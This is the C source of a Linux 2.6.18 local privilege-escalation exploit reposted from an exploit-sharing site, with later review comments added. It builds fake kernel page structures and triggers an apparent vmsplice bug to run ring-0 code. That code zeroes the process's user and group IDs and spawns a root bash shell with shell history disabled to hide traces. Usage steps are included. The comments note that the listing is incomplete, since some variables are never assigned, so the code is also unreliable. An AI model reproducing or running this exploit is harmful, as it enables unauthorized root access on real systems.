/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ 1
* 1/"\ __/" __ \/\ \__/"__" \ 0
* 0/\_, \ ___/\_\/\_\ \ \ ___\ \, _\/\ \/\ \ _ ___ 1
* 1 \/_/\ \/"_ ' \ \/\ \/_/_\_<_/' ___\ \ \/\ \ \ \ \/\ ' __\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \ \ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/\/____/\/__/\/___/\/_/1
* 1 \ \____/>> EXploit database separated by EXploit 0
* 0 \/___/type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified by cross 1
* 1 0
* 0 Linux 2011 1
* 1 0
*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 local root; previously coded by "Angel injection" (thanks for that),
* but that copy had errors while compiling, so this is a modified version of the
* exploit that is reported to work. Note for readers: the body is the vmsplice()
* fake-struct-page technique (PIPE_BUFFERS / PG_compound), i.e. presumably the
* early-2008 vmsplice bug, CVE-2008-0600 - confirm. A 2011-era vendor build of
* 2.6.18 (the "-238" in the title) is likely to already carry the fix for it, so
* check the vendor's errata before assuming a target is affected. The listing as
* reproduced on this page is itself case-mangled and incomplete in places. Usage:
*
*   gcc -o exploit exploit.c
*   chmod +x exploit      (gcc already sets the executable bit; the original's
*                          "chmod 777" makes the binary world-writable for no reason)
*   ./exploit
*
* GREETZ:R0073R (1337day.com), r4dc0re,side^effects and all members of 1337day Team) ..... & All Members of R00tw0rm.com (RW): )
*
* Submit Your Exploit at [email protected] | [Email protected]
*
* For educational purposes only.
*/
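#define _GNU_SOURCE
/* NOTE(review): the header names on the include lines were stripped by the
 * extraction (the <...> part was read as markup). The list below is
 * reconstructed from the identifiers this file actually uses: printf/fflush
 * (stdio.h), exit/putenv (stdlib.h), memset/strerror (string.h), ULONG_MAX
 * (limits.h), signal/SIGPIPE (signal.h), getuid/setresuid/execl/pipe/close/
 * syscall (unistd.h, with _GNU_SOURCE), errno (errno.h), struct iovec
 * (sys/uio.h), mmap and the MAP_*/PROT_* flags (sys/mman.h), __NR_*
 * (sys/syscall.h). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <errno.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#define __KERNEL__
/* #include <...>
 * NOTE(review): this include's name is also lost. It is pulled in with
 * __KERNEL__ defined, so it was a kernel-namespace header; nothing in the
 * listing as shown depends on it, so it is left commented out rather than
 * guessed. */

/* Constants mirroring the target kernel as this exploit assumes them:
 * presumably the number of pipe buffers per pipe and the bit index of the
 * PG_compound page flag - both tie the code to one kernel generation. */
#define PIPE_BUFFERS 16
#define PG_compound 14
#define UINT unsigned int
#define static_inline static inline __attribute__((always_inline))
/* Top of a static array used as a stack: its end minus a 40-byte red zone.
 * Only meaningful on an actual array (sizeof of a pointer would be wrong). */
#define STACK(x) ((x) + sizeof(x) - 40)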
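/*
 * User-space replica of the target kernel's struct page, laid out so the
 * fake pages this exploit builds in its own mappings line up with what the
 * kernel reads. Only flags, count, private and lru.next are ever written
 * (see main); the remaining fields exist purely for layout. Any difference
 * in the target kernel's struct page layout silently breaks this.
 */
struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};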
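/* User-mode landing point, defined below; declared early because the
 * arch-specific Exit_kernel() takes its address. Left without a prototype
 * so it also type-checks as the SIGPIPE handler main() installs. */
void Exit_code();
/* Private 1 MiB user-mode stack that Exit_kernel() switches to when
 * returning from ring 0, so the code it lands in never runs on the kernel
 * stack it came from. */
char exit_stack[1024 * 1024];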
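/*
 * Print a failure message - with strerror(err) appended when err is
 * nonzero - flush both standard streams and terminate with status 1.
 * Never returns.
 */
__attribute__((noreturn))
void Die(const char *msg, int err)
{
	printf(err ? "[-]%s:%s\n" : "[-]%s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}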
#if defined (__i386__)
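#ifndef __NR_vmsplice
#define __NR_vmsplice 316   /* i386 syscall number, for headers too old to know it */
#endif
/* User-mode code/stack selectors and the EFLAGS value written into the
 * iret frame by Exit_kernel(). 0x246 has IF (bit 9) set, so interrupts are
 * re-enabled on the return to ring 3. Selector values are GDT-layout
 * assumptions about the target kernel. */
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246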
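/*
 * Leave ring 0 on i386: overwrite the five words at the top of the current
 * (kernel) stack with an iret frame - EIP, CS, EFLAGS, ESP, SS from the top
 * down - and execute iret, landing in Exit_code() at user privilege on the
 * private exit_stack. Only meaningful when reached from Kernel_code();
 * never returns. The original listing had the constraint letters
 * case-mangled ("I"/"R"), which are different, invalid constraints.
 */
static inline __attribute__((always_inline))
void Exit_kernel(void)
{
	__asm__ __volatile__ (
		"movl %0, 0x10(%%esp);"
		"movl %1, 0x0c(%%esp);"
		"movl %2, 0x08(%%esp);"
		"movl %3, 0x04(%%esp);"
		"movl %4, 0x00(%%esp);"
		"iret"
		: : "i" (USER_SS), "r" (exit_stack + sizeof(exit_stack) - 40), "i" (USER_FL),
		    "i" (USER_CS), "r" (Exit_code)
	);
}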
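/*
 * Read the current task pointer on i386: mask ESP down to an 8 KiB boundary
 * (assumes an 8 KiB, aligned kernel stack) and take the first word there -
 * presumably thread_info->task on this kernel generation; confirm. Only
 * valid in ring 0. The original did the arithmetic in EAX without declaring
 * the clobber; it is done in the output register instead.
 */
static inline __attribute__((always_inline))
void *get_current(void)
{
	unsigned long curr;
	__asm__ __volatile__ (
		"movl %%esp, %0;"
		"andl %1, %0;"
		"movl (%0), %0"
		: "=r" (curr)
		: "i" (~8191)
	);
	return (void *)curr;
}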
#elif defined (__x86_64__)
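#ifndef __NR_vmsplice
#define __NR_vmsplice 278   /* x86_64 syscall number, for headers too old to know it */
#endif
/* User-mode code/stack selectors and the RFLAGS value written into the
 * iretq frame by Exit_kernel(). 0x246 has IF (bit 9) set, so interrupts are
 * re-enabled on the return to ring 3. Selector values are GDT-layout
 * assumptions about the target kernel. */
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246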
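/*
 * Leave ring 0 on x86_64: swapgs restores the user GS base, then the five
 * quadwords at the top of the current (kernel) stack are overwritten with
 * an iretq frame - RIP, CS, RFLAGS, RSP, SS from the top down - and iretq
 * lands in Exit_code() at user privilege on the private exit_stack. Only
 * meaningful when reached from Kernel_code(); never returns. The original
 * listing had the constraint letters case-mangled ("I"/"R").
 */
static inline __attribute__((always_inline))
void Exit_kernel(void)
{
	__asm__ __volatile__ (
		"swapgs;"
		"movq %0, 0x20(%%rsp);"
		"movq %1, 0x18(%%rsp);"
		"movq %2, 0x10(%%rsp);"
		"movq %3, 0x08(%%rsp);"
		"movq %4, 0x00(%%rsp);"
		"iretq"
		: : "i" (USER_SS), "r" (exit_stack + sizeof(exit_stack) - 40), "i" (USER_FL),
		    "i" (USER_CS), "r" (Exit_code)
	);
}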
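/*
 * Read the current task pointer on x86_64: the quadword at offset 0 of the
 * area addressed through %gs - presumably the per-CPU current-task slot on
 * this kernel generation; confirm. Only valid in ring 0 with the kernel GS
 * base loaded, i.e. before Exit_kernel()'s swapgs.
 */
static inline __attribute__((always_inline))
void *get_current(void)
{
	unsigned long curr;
	__asm__ __volatile__ (
		"movq %%gs:(0), %0"
		: "=r" (curr)
	);
	return (void *)curr;
}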
#else
#error "Unsupported Arch"
#endif
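/*
 * vmsplice(2) entry point. On very old glibc the _syscall4 macro generates
 * a real stub; otherwise fall back to syscall(2) with __NR_vmsplice from
 * <sys/syscall.h> or the per-arch fallback above. The original listing had
 * the names case-mangled and a space before the macro's parameter list,
 * which would have turned _vmsplice into an object-like macro.
 */
#if defined(_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)
#else
#define _vmsplice(fd, io, nr, fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif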
static uint UID, GID;
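/*
 * Payload that runs in ring 0. Walks up to 1024-13 32-bit words from the
 * current task structure looking for the signature UID,UID,UID,UID,
 * GID,GID,GID,GID (presumably the four uid and four gid fields of the task;
 * confirm against the target's task_struct layout), zeroes all eight, skips
 * one pointer-sized field past them and sets the next three words to
 * all-ones (presumably the capability sets; confirm), then returns to user
 * mode through Exit_kernel(). If the signature is not found it still exits
 * to user mode, where Exit_code() reports failure.
 */
void Kernel_code(void)
{
	int i;
	UINT *p = get_current();

	for (i = 0; i < 1024 - 13; i++) {
		if (p[0] == UID && p[1] == UID &&
		    p[2] == UID && p[3] == UID &&
		    p[4] == GID && p[5] == GID &&
		    p[6] == GID && p[7] == GID) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			/* Past the eight id words and one pointer, raise three
			 * words to all-ones. */
			p = (UINT *)((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}
	Exit_kernel();
}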
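/*
 * User-mode landing point: reached through Exit_kernel()'s iret onto
 * exit_stack, and also installed by main() as the SIGPIPE handler, so the
 * write to a reader-less pipe ends up here either way. Checks that the uid
 * change took effect and replaces the process with an interactive shell.
 *
 * Detection note: HISTFILE=/dev/null is deliberate anti-forensics (no bash
 * history for the root shell). An interactive bash with HISTFILE pointed at
 * /dev/null, parented by an unprivileged user's process, is a useful
 * indicator for responders. The original listing had the variable name
 * case-mangled ("Histfile="), which bash would simply ignore; restored.
 * Declared without a prototype so it type-checks as a signal handler.
 */
void Exit_code()
{
	if (getuid() != 0)
		Die("WTF", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "Bash", "-i", NULL);
	Die("/bin/bash", errno);
}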
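/*
 * Entry point (argc/argv unused). Sequence, as far as this listing shows:
 *   1. make the caller's real/effective/saved ids all equal so the 8-word
 *      uid/gid signature Kernel_code() scans for is present;
 *   2. build fake struct page objects at fixed user addresses
 *      (pages[0..1], pages[2..3], pages[4]): each head has PG_compound set,
 *      private pointing at itself and count 1, and the following page's
 *      lru.next holds Kernel_code - presumably the pointer the kernel
 *      follows for a compound page, which cannot be verified from this file;
 *   3. vmsplice() a ULONG_MAX-length iovec into a pipe whose read end is
 *      closed. SIGPIPE is routed to Exit_code() so the process lands there
 *      whether the kernel payload ran (via Exit_kernel()'s iret) or not.
 *
 * NOTE(review): the listing as reproduced here is incomplete. map_size is
 * never assigned before its first use, and pages[0] and pages[4] are read
 * before being assigned - the lines that chose the fixed mapping addresses
 * (the most kernel-specific part of the exploit) are missing. Both are
 * undefined behaviour; they are flagged inline rather than reconstructed.
 */
int main(int argc, char *argv[])
{
	int pi[2];
	size_t map_size;            /* NOTE(review): never assigned in this listing */
	char *map_addr;
	struct iovec iov;
	struct page *pages[5];      /* fake struct page objects in user memory */

	(void)argc;
	(void)argv;

	UID = getuid();
	GID = getgid();
	setresuid(UID, UID, UID);
	setresgid(GID, GID, GID);

	/* Root needs no exploit, and an all-zero signature would match far too
	 * easily in Kernel_code()'s scan. The literal below is as posted: the
	 * original text was rewritten by an e-mail obfuscation filter. */
	if (!UID || !GID)
		Die("[Email protected]#$", 0);

	/***** fake page pair #1 *****/
	/* NOTE(review): pages[0] is read here without ever being assigned. */
	pages[1] = pages[0] + 1;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		Die("Mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap:0x%lx. 0x%lx\n ", (unsigned long)map_addr,
	       (unsigned long)(map_addr + map_size));
	printf("[+] page:0x%lx\n", (unsigned long)pages[0]);
	printf("[+] page:0x%lx\n", (unsigned long)pages[1]);
	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long)pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long)Kernel_code;

	/***** fake page pair #2 *****/
	/* Its address is the first word of fake page #1, i.e. the flags value
	 * (1 << PG_compound) just written there. */
	pages[2] = *(void **)pages[0];
	pages[3] = pages[2] + 1;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		Die("Mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap:0x%lx. 0x%lx\n ", (unsigned long)map_addr,
	       (unsigned long)(map_addr + map_size));
	printf("[+] page:0x%lx\n", (unsigned long)pages[2]);
	printf("[+] page:0x%lx\n", (unsigned long)pages[3]);
	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long)pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long)Kernel_code;

	/***** third fixed mapping *****/
	/* NOTE(review): pages[4] is read here without ever being assigned. */
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		Die("Mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap:0x%lx. 0x%lx\n ", (unsigned long)map_addr,
	       (unsigned long)(map_addr + map_size));
	printf("[+] page:0x%lx\n", (unsigned long)pages[4]);

	/***** buffer handed to vmsplice *****/
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		Die("Mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap:0x%lx. 0x%lx\n ", (unsigned long)map_addr,
	       (unsigned long)(map_addr + map_size));

	/***** trigger *****/
	if (pipe(pi) < 0)
		Die("pipe", errno);
	close(pi[0]);                 /* leave the pipe without a reader */
	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;     /* deliberately absurd length */
	signal(SIGPIPE, Exit_code);   /* a reader-less pipe write lands in Exit_code too */
	_vmsplice(pi[1], &iov, 1, 0);
	Die("Vmsplice", errno);
	return 0;
}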
/* Linux 2.6.18-238 local root exploit (posting title). This trailer sits outside any comment in the original listing and would break compilation; keep it commented out. */